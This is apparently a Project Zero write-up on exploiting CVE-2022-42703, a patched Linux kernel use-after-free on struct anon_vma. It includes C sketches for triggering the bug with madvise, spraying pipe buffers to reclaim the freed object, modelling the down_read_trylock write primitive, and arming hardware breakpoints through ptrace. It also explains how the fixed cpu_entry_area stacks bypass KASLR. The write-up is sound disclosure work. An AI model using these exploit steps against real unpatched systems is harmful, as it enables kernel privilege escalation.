Seth Jenkins, Project Zero
This blog post details an exploit for CVE-2022-42703 (P0 issue 2351 – Fixed 5 September 2022), a bug Jann Horn found in the Linux kernel’s memory management (MM) subsystem that leads to a use-after-free on struct anon_vma. As the bug is very complex (I certainly struggle to understand it!), a future blog post will describe the bug in full. For the time being, the issue tracker entry, this LWN article explaining what an anon_vma is, and the commit that introduced the bug are great resources for gaining additional context.
Setting the scene
Successfully triggering the underlying vulnerability causes folio->mapping to point to a freed anon_vma object. madvise(…, MADV_PAGEOUT) can then be called repeatedly to trigger accesses to the freed anon_vma in folio_lock_anon_vma_read():
struct anon_vma *folio_lock_anon_vma_read(struct folio *folio,
                                          struct rmap_walk_control *rwc)
{
    struct anon_vma *anon_vma = NULL;
    struct anon_vma *root_anon_vma;
    unsigned long anon_mapping;

    rcu_read_lock();
    anon_mapping = (unsigned long)READ_ONCE(folio->mapping);
    if ((anon_mapping & PAGE_MAPPING_FLAGS) != PAGE_MAPPING_ANON)
        goto out;
    if (!folio_mapped(folio))
        goto out;

    // anon_vma is dangling pointer
    anon_vma = (struct anon_vma *) (anon_mapping - PAGE_MAPPING_ANON);
    // root_anon_vma is read from dangling pointer
    root_anon_vma = READ_ONCE(anon_vma->root);
    if (down_read_trylock(&root_anon_vma->rwsem)) {
        […]
        if (!folio_mapped(folio)) { // false
            […]
        }
        goto out;
    }

    if (rwc && rwc->try_lock) { // true
        anon_vma = NULL;
        rwc->contended = true;
        goto out;
    }

    […]
out:
    rcu_read_unlock();
    return anon_vma; // return dangling pointer
}
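As a concrete illustration of that trigger loop, a minimal sketch follows, assuming an ordinary anonymous mapping stands in for the VMA affected by the bug; the mapping size and iteration count are arbitrary illustrative values, not the exploit's real parameters:

#include <stddef.h>
#include <sys/mman.h>

#ifndef MADV_PAGEOUT
#define MADV_PAGEOUT 21                    /* value from uapi/asm-generic/mman-common.h */
#endif

#define REGION_SIZE (2UL * 1024 * 1024)    /* illustrative mapping size */

int main(void)
{
    /* Stand-in for the VMA whose folios' ->mapping pointers have been made
     * to dangle by the bug. */
    char *region = mmap(NULL, REGION_SIZE, PROT_READ | PROT_WRITE,
                        MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (region == MAP_FAILED)
        return 1;

    /* Fault the pages in so there is something for the rmap walk to visit. */
    for (size_t off = 0; off < REGION_SIZE; off += 4096)
        region[off] = 1;

    /* Each pass walks the reverse mapping and ends up in
     * folio_lock_anon_vma_read(), dereferencing the stale anon_vma. */
    for (int i = 0; i < 100; i++)
        madvise(region, REGION_SIZE, MADV_PAGEOUT);

    return 0;
}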
One potential exploit technique is to let the function return the dangling anon_vma pointer and try to make the subsequent operations do something useful. Instead, we chose to use the down_read_trylock() call within the function to corrupt memory at a chosen address, which we can do if we can control the root_anon_vma pointer that is read from the freed anon_vma.
Controlling the root_anon_vma pointer means reclaiming the freed anon_vma with attacker-controlled memory. struct anon_vma structures are allocated from their own kmalloc cache, which means we cannot simply free one and reclaim it with a different object. Instead we cause the associated anon_vma slab page to be returned to the kernel page allocator by following a very similar strategy to the one documented here. By freeing all the anon_vma objects on a slab page, then flushing the percpu slab page partial freelist, we can cause the virtual memory previously associated with the anon_vma to be returned to the page allocator. We then spray pipe buffers in order to reclaim the freed anon_vma with attacker-controlled memory.
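To make the reclaim step more concrete, here is a hedged sketch of the pipe buffer spray. The pipe count, the per-object stride within the sprayed page, and the assumption that root is the first field of struct anon_vma are illustrative; the real exploit's values may differ:

#include <stddef.h>
#include <stdint.h>
#include <unistd.h>

#define NUM_PIPES       512                     /* assumed spray size */
#define FAKE_ROOT_VALUE 0x4141414141414141UL    /* placeholder root_anon_vma pointer */

int main(void)
{
    static char page[4096];
    static int pipes[NUM_PIPES][2];

    /* Fill the page with fake anon_vma objects whose ->root field (assumed
     * to be the first member) points wherever we want down_read_trylock()
     * to operate; 0x80 is an assumed object stride. */
    for (size_t off = 0; off < sizeof(page); off += 0x80)
        *(uint64_t *)(page + off) = FAKE_ROOT_VALUE;

    for (int i = 0; i < NUM_PIPES; i++) {
        if (pipe(pipes[i]) < 0)
            return 1;
        /* Writing a full page makes the kernel back the pipe buffer with a
         * freshly allocated page, hopefully the one the anon_vma slab
         * previously occupied. */
        if (write(pipes[i][1], page, sizeof(page)) != sizeof(page))
            return 1;
    }

    pause();    /* keep the spray resident while the UAF is exercised */
    return 0;
}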
At this point, we’ve discussed how to turn our use-after-free into a down_read_trylock() call on an attacker-controlled pointer. The implementation of down_read_trylock() is as follows:
struct rw_semaphore {
    atomic_long_t count;
    atomic_long_t owner;
    struct optimistic_spin_queue osq; /* spinner MCS lock */
    raw_spinlock_t wait_lock;
    struct list_head wait_list;
};

…

static inline int __down_read_trylock(struct rw_semaphore *sem)
{
    long tmp;

    DEBUG_RWSEMS_WARN_ON(sem->magic != sem, sem);

    tmp = atomic_long_read(&sem->count);
    while (!(tmp & RWSEM_READ_FAILED_MASK)) {
        if (atomic_long_try_cmpxchg_acquire(&sem->count, &tmp,
                                            tmp + RWSEM_READER_BIAS)) {
            rwsem_set_reader_owned(sem);
            return 1;
        }
    }
    return 0;
}
It was helpful to emulate down_read_trylock() in unicorn to determine how it behaves when given different sem->count values. Assuming this code is operating on inert and unchanging memory, it will increment sem->count by 0x100 if the 3 least significant bits and the most significant bit are all unset. That means it is difficult to modify a kernel pointer (kernel virtual addresses have the most significant bit set) and we cannot modify any values that are not 8-byte aligned (as they’ll have one or more of the bottom three bits set). Additionally, this semaphore is later unlocked, causing whatever write we perform to be reverted in the imminent future. Furthermore, at this point we don’t have an established strategy for determining the KASLR slide or figuring out the addresses of any objects we might want to overwrite with our newfound primitive. It turns out that regardless of any randomization the kernel presently has in place, there’s a straightforward strategy for exploiting this bug even given such a constrained arbitrary write.
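The following user-space model is a sketch of that behavior; the mask and bias constants mirror RWSEM_READ_FAILED_MASK and RWSEM_READER_BIAS as described above, but treat the exact values as kernel-version-dependent assumptions:

#include <stdint.h>
#include <stdio.h>

/* Assumed constants: the three low flag bits plus the sign bit make the
 * trylock fail; a successful reader lock adds the reader bias. */
#define MODEL_READ_FAILED_MASK  (0x7UL | (1UL << 63))
#define MODEL_READER_BIAS       0x100UL

/* Models the write primitive: if the 64-bit value at the target address has
 * the three least significant bits and the most significant bit clear, it is
 * incremented by 0x100; otherwise nothing is written. */
static int model_down_read_trylock(uint64_t *target)
{
    uint64_t tmp = *target;
    if (tmp & MODEL_READ_FAILED_MASK)
        return 0;
    *target = tmp + MODEL_READER_BIAS;
    return 1;
}

int main(void)
{
    uint64_t kernel_pointer_like = 0xffff888012345678UL;   /* MSB set: untouched */
    uint64_t unaligned_value     = 0x2001;                 /* low bits set: untouched */
    uint64_t writable_value      = 0x1000;                 /* gets +0x100 */

    printf("%d 0x%llx\n", model_down_read_trylock(&kernel_pointer_like),
           (unsigned long long)kernel_pointer_like);
    printf("%d 0x%llx\n", model_down_read_trylock(&unaligned_value),
           (unsigned long long)unaligned_value);
    printf("%d 0x%llx\n", model_down_read_trylock(&writable_value),
           (unsigned long long)writable_value);             /* prints 1 0x1100 */
    return 0;
}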
Stack corruption…
On x86-64 Linux, when the CPU handles certain interrupts and exceptions, it will swap to a dedicated stack that is mapped at a static and non-randomized virtual address, with a different stack for each exception type. A brief description of those stacks and their parent structure, the cpu_entry_area, can be found here. These stacks are most often used on entry into the kernel from userland, but they’re used for exceptions that happen in kernel mode as well. We’ve recently seen kCTF entries where attackers take advantage of the non-randomized cpu_entry_area stacks in order to access data at a known virtual address in kernel-accessible memory, even in the presence of SMAP and KASLR. You could also use these stacks to forge attacker-controlled data at a known kernel virtual address. This works because the attacker task’s general-purpose register contents are pushed directly onto this stack when the switch from userland to kernel mode occurs due to one of these exceptions. The same happens when the kernel itself generates an Interrupt Stack Table (IST) exception and swaps to an exception stack, except that in that case the kernel’s GPRs are pushed instead. These pushed registers are later used to restore kernel state once the exception is handled. In the case of a userland-triggered exception, register contents are restored from the task stack.
One example of an IST exception is the #DB (debug) exception, which an attacker can trigger via a hardware breakpoint; the associated debug registers are described here. Hardware breakpoints can be triggered by a variety of different memory access types, namely reads, writes, and instruction fetches. These hardware breakpoints can be set using ptrace(2), and are preserved during kernel mode execution in a task context.
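As an illustration of that last point, here is a hedged sketch of arming a hardware watchpoint on a traced child via ptrace(2). The DR7 bit layout follows the Intel SDM, but treat the specific condition and length encodings, and the use of a simple write watchpoint, as assumptions made for this example rather than the exploit's exact setup:

#include <signal.h>
#include <stddef.h>
#include <stdio.h>
#include <sys/ptrace.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

static volatile long watched;   /* the child will write to this address */

int main(void)
{
    pid_t pid = fork();
    if (pid == 0) {
        ptrace(PTRACE_TRACEME, 0, NULL, NULL);
        raise(SIGSTOP);         /* wait for the parent to arm the debug registers */
        watched = 1;            /* this store raises #DB once DR0/DR7 are set */
        _exit(0);
    }

    waitpid(pid, NULL, 0);      /* child stopped by SIGSTOP */

    /* DR0: linear address to watch. */
    ptrace(PTRACE_POKEUSER, pid,
           offsetof(struct user, u_debugreg[0]), (void *)&watched);

    /* DR7: enable local breakpoint 0 (bit 0), condition = data write
     * (bits 16-17 = 0b01), length = 8 bytes (bits 18-19 = 0b10). */
    unsigned long dr7 = (1UL << 0) | (1UL << 16) | (2UL << 18);
    ptrace(PTRACE_POKEUSER, pid,
           offsetof(struct user, u_debugreg[7]), (void *)dr7);

    ptrace(PTRACE_CONT, pid, NULL, NULL);
    waitpid(pid, NULL, 0);      /* SIGTRAP delivered when the watchpoint fires */
    printf("child hit the hardware watchpoint\n");

    ptrace(PTRACE_CONT, pid, NULL, NULL);
    waitpid(pid, NULL, 0);
    return 0;
}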